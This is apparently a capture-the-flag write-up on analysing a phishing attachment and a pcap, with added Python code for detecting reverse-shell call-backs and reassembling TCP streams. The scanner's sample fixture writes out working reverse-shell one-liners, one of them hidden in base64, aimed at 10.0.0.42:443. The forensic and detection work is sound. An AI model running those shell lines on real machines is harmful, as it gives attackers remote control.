Author: AMD

This is a writeup for the ContAInment room.


CONNECT

Let's connect to the workstation with SSH.


CHECK THE EMAILS

Let's analyze them, starting with the most recent one.

Let's look at the email.


FIND THE ATTACHMENT

Let's analyze it.

It contains a reverse shell to 10.0.0.42 on port 443.
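To extract the call-back address from an attachment like this one without reading every line by hand, here is a small triage scanner. It is an added example, not the room's code or the author's, and the script it scans is a constructed sample: it combines a Python one-liner reverse shell with a base64-wrapped bash /dev/tcp shell pointing at the same 10.0.0.42:443, so both the plain and the encoded form are found. Pattern names, the helper functions and the sample text are all assumptions introduced here.

```python
"""Pull call-back host:port pairs out of a suspicious script, including base64-wrapped ones."""
import base64
import re

# (description, regex) for the reverse-shell forms we look for. Extend as needed.
CALLBACK_PATTERNS = [
    ("bash /dev/tcp redirect",
     re.compile(r"/dev/tcp/(?P<host>[\w.:-]+)/(?P<port>\d{1,5})")),
    ("netcat",
     re.compile(r"\b(?:nc|ncat|netcat)\b[^\n|;]*?\s(?P<host>\d{1,3}(?:\.\d{1,3}){3})\s+(?P<port>\d{1,5})")),
    ("python socket.connect",
     re.compile(r"connect\(\(\s*['\"](?P<host>[^'\"]+)['\"]\s*,\s*(?P<port>\d{1,5})\s*\)\)")),
    ("ruby TCPSocket",
     re.compile(r"TCPSocket\.new\(\s*['\"](?P<host>[^'\"]+)['\"]\s*,\s*(?P<port>\d{1,5})\s*\)")),
]
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")


def _scan(text, suffix=""):
    """[(offset, kind, host, port)] for every pattern hit in text."""
    hits = []
    for kind, rx in CALLBACK_PATTERNS:
        for m in rx.finditer(text):
            hits.append((m.start(), kind + suffix, m["host"], int(m["port"])))
    return hits


def _decoded_blobs(text):
    """Yield printable text hidden in base64 runs (the `echo <b64> | base64 -d | bash` trick)."""
    for m in B64_BLOB.finditer(text):
        try:
            blob = base64.b64decode(m.group(), validate=True)
        except ValueError:          # binascii.Error is a ValueError: not real base64
            continue
        if blob and all(32 <= c < 127 or c in b"\t\r\n" for c in blob):
            yield blob.decode("ascii")


def find_callbacks(text):
    """[(kind, host, port)] in order of appearance; base64-wrapped hits follow the plain ones."""
    hits = sorted(_scan(text))
    for blob in _decoded_blobs(text):
        hits.extend(sorted(_scan(blob, " (base64-decoded)")))
    return [(kind, host, port) for _, kind, host, port in hits]


def callback_endpoints(text):
    """Distinct (host, port) pairs the script would connect out to."""
    return {(host, port) for _, host, port in find_callbacks(text)}


# Constructed sample attachment (not the one from the room); the address and port
# are the ones the email analysis above identified.
SAMPLE_ATTACHMENT = (
    "#!/bin/bash\n"
    "apt-get update -qq\n"
    "python3 -c 'import socket,os,pty;s=socket.socket();s.connect((\"10.0.0.42\",443));"
    "[os.dup2(s.fileno(),f) for f in (0,1,2)];pty.spawn(\"/bin/sh\")' &\n"
    "echo " + base64.b64encode(b"bash -i >& /dev/tcp/10.0.0.42/443 0>&1").decode()
    + " | base64 -d | bash\n"
)

if __name__ == "__main__":
    for kind, host, port in find_callbacks(SAMPLE_ATTACHMENT):
        print(f"{kind}: {host}:{port}")
```

The base64 pass matters in practice: a scanner that only greps the plain text reports the Python shell and misses the second one entirely. The regex list is deliberately narrow (four common shapes); treat an empty result as "nothing matched these patterns", not as "clean".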


FIND THE PCAP

Let's go to the incident date with "cd /home/o.deer/Documents/pcap_dumps/2025-06-17".

Let's run the loop below to find the .pcap we need to analyze. Note that "follow,tcp,ascii,0" only dumps TCP stream index 0 of each file, so a capture whose interesting data sits in a later stream would print nothing here and would need a different stream index.

# Loop over every capture from the incident date and dump the first TCP stream of each.
# -q suppresses the per-packet listing; -z follow,tcp,ascii,0 prints stream 0 as ASCII.
for file in /home/o.deer/Documents/pcap_dumps/2025-06-17/*.pcap; do
  echo "Checking $file"
  tshark -r "$file" -q -z follow,tcp,ascii,0
done

Only /home/o.deer/Documents/pcap_dumps/2025-06-17/session_4444_dump.pcap produces any output.


ANALYZE PCAP FILE

Let's start with the reconstruction.

Let's read /home/o.deer/qwen-output/reassembled_data_dump.txt

Could this be the password of the .zip file?
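If you would rather not trust an AI-generated dump for the reconstruction step, the reassembly can be done by hand from the pcap. The following is an added example (not the room's code or the author's): it parses a classic pcap, groups TCP payloads per stream and direction, puts segments back in sequence order, drops retransmitted bytes and marks holes the way tshark's follow output does. The capture it runs on is constructed in memory: a hypothetical victim 10.0.0.55:51234 talking to 10.0.0.42:443, with one segment arriving out of order, one retransmitted, and one never captured. Function names, the victim address and the sample data are assumptions; only the attacker endpoint comes from the page.

```python
"""Reassemble the payload of every TCP stream in a classic pcap (no tshark needed)."""
import socket
import struct

GAP = b"[%d bytes missing in capture]"


def build_tcp_frame(src, sport, dst, dport, seq, payload):
    """Minimal Ethernet/IPv4/TCP frame. Checksums stay zero: nothing here validates them."""
    eth = b"\x00" * 12 + b"\x08\x00"                      # dst MAC, src MAC, EtherType IPv4
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 0, 0, 64, 6, 0,
                     socket.inet_aton(src), socket.inet_aton(dst))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, 0x18, 65535, 0, 0)
    return eth + ip + tcp + payload


def build_pcap(frames):
    """Classic little-endian pcap, LINKTYPE_ETHERNET, one record per frame."""
    header = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    records = (struct.pack("<IIII", i, 0, len(f), len(f)) + f for i, f in enumerate(frames))
    return header + b"".join(records)


# Constructed sample: a hypothetical victim calling back to the attacker address from the
# email. Segments arrive out of order, one is retransmitted, and one is never captured.
VICTIM, ATTACKER = ("10.0.0.55", 51234), ("10.0.0.42", 443)
SAMPLE_PCAP = build_pcap([
    build_tcp_frame(*ATTACKER, *VICTIM, 5000, b"id\n"),
    build_tcp_frame(*VICTIM, *ATTACKER, 1012, b"groups=0(root)\n"),  # arrives before seq 1000
    build_tcp_frame(*VICTIM, *ATTACKER, 1000, b"uid=0(root) "),
    build_tcp_frame(*VICTIM, *ATTACKER, 1000, b"uid=0(root) "),      # retransmission
    build_tcp_frame(*ATTACKER, *VICTIM, 5003, b"cat /etc/hostname\n"),
    build_tcp_frame(*ATTACKER, *VICTIM, 5030, b"exit\n"),            # 9 bytes were dropped
])


def iter_frames(pcap):
    """Yield the raw bytes of each record in a classic pcap (either byte order)."""
    magic, = struct.unpack_from("<I", pcap, 0)
    endian = {0xA1B2C3D4: "<", 0xD4C3B2A1: ">"}.get(magic)
    if endian is None:
        raise ValueError("not a classic pcap (pcapng is not handled here)")
    linktype, = struct.unpack_from(endian + "I", pcap, 20)
    if linktype != 1:
        raise ValueError("only LINKTYPE_ETHERNET captures are handled")
    off = 24
    while off + 16 <= len(pcap):
        incl_len, = struct.unpack_from(endian + "I", pcap, off + 8)
        off += 16
        yield pcap[off:off + incl_len]
        off += incl_len


def parse_tcp(frame):
    """(src, sport, dst, dport, seq, payload) for an IPv4/TCP frame, else None."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00":
        return None
    ip = frame[14:]
    if ip[9] != 6:                                         # IP protocol 6 = TCP
        return None
    ihl = (ip[0] & 0x0F) * 4
    total_len, = struct.unpack_from("!H", ip, 2)
    tcp = ip[ihl:total_len]
    sport, dport, seq = struct.unpack_from("!HHI", tcp, 0)
    data_off = (tcp[12] >> 4) * 4
    return (socket.inet_ntoa(ip[12:16]), sport, socket.inet_ntoa(ip[16:20]), dport,
            seq, tcp[data_off:])


def stitch(segments):
    """Order {seq: payload} by sequence number, drop retransmitted or overlapping
    bytes, and mark holes in the capture instead of silently joining across them."""
    out, expected = bytearray(), None
    for seq in sorted(segments):
        data = segments[seq]
        expected = seq if expected is None else expected
        if seq + len(data) <= expected:
            continue                                       # already have these bytes
        if seq < expected:
            data = data[expected - seq:]                   # partial overlap: keep the new tail
        elif seq > expected:
            out += GAP % (seq - expected)                  # hole in the capture
        out += data
        expected = seq + len(segments[seq])
    return bytes(out)


def follow_streams(pcap):
    """{(endpointA, endpointB): {sender_endpoint: reassembled_bytes}} for every TCP stream."""
    streams = {}
    for frame in iter_frames(pcap):
        parsed = parse_tcp(frame)
        if parsed is None or not parsed[5]:                # skip non-TCP and empty ACKs
            continue
        src, sport, dst, dport, seq, payload = parsed
        a, b = (src, sport), (dst, dport)
        key = (a, b) if a < b else (b, a)                  # direction-independent stream id
        streams.setdefault(key, {}).setdefault(a, {}).setdefault(seq, payload)  # first copy wins
    return {key: {who: stitch(segs) for who, segs in dirs.items()} for key, dirs in streams.items()}


if __name__ == "__main__":
    for (a, b), dirs in follow_streams(SAMPLE_PCAP).items():
        print(f"=== stream {a[0]}:{a[1]} <-> {b[0]}:{b[1]} ===")
        for who, data in dirs.items():
            print(f"--- from {who[0]}:{who[1]} ---\n{data.decode('latin-1')}")
```

To use it on the real file, replace SAMPLE_PCAP with `open(path, "rb").read()`. The gap marker is the important safety net: a naive concatenation in packet order would have glued "cat /etc/hostname" straight onto "exit" and produced a password candidate that was never on the wire.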


UNZIP


GET THE FLAG

Let's look at the guide.

Let's use AI again.